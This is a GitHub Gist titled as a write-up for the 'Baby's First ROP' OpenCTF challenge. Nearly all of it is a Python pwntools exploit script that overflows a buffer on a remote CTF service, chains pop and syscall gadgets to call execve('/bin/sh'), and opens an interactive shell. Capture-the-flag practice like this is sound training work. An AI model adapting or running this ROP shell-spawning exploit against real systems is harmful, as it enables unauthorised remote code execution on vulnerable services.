Instantly share code, notes, and snippets.

Embed
What would you like to do?
Writeup for Baby's First ROP (OpenCTF)
#!/usr/bin/env python2
from pwn import *
REMOTE = True
DBG = False
FNAME = './cracked_chall_binary'
HOST = '172.31.2.62'
PORT = '47802'
GADGETS_BASE = 0x601080
GADGET_POP_EAX = GADGETS_BASE + 0x7609#: 58 pop %eax
GADGET_POP_ESI = GADGETS_BASE + 0x761b#: 5e pop %esi
GADGET_POP_EDX = GADGETS_BASE + 0x760f#: 5a pop %edx
GADGET_SYSCALL = GADGETS_BASE + 0x2d0f#: 0f 05 syscall
def getp():
if REMOTE:
p = remote(HOST, PORT)
elif DBG:
p = process(['linux_serverx64', '-p4200', FNAME])
else:
p = process([FNAME])
return p
p = getp()
payload = ''
payload += '/bin/sh\x00'
payload += p64(0x00)
payload += 'A'*(88-len(payload))
payload += p64(GADGET_POP_EAX)
payload += p64(59)
payload += p64(GADGET_POP_ESI)
payload += p64(0x631088)
payload += p64(GADGET_POP_EDX)
payload += p64(0x631088)
payload += p64(GADGET_SYSCALL)
p.sendline(payload)
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment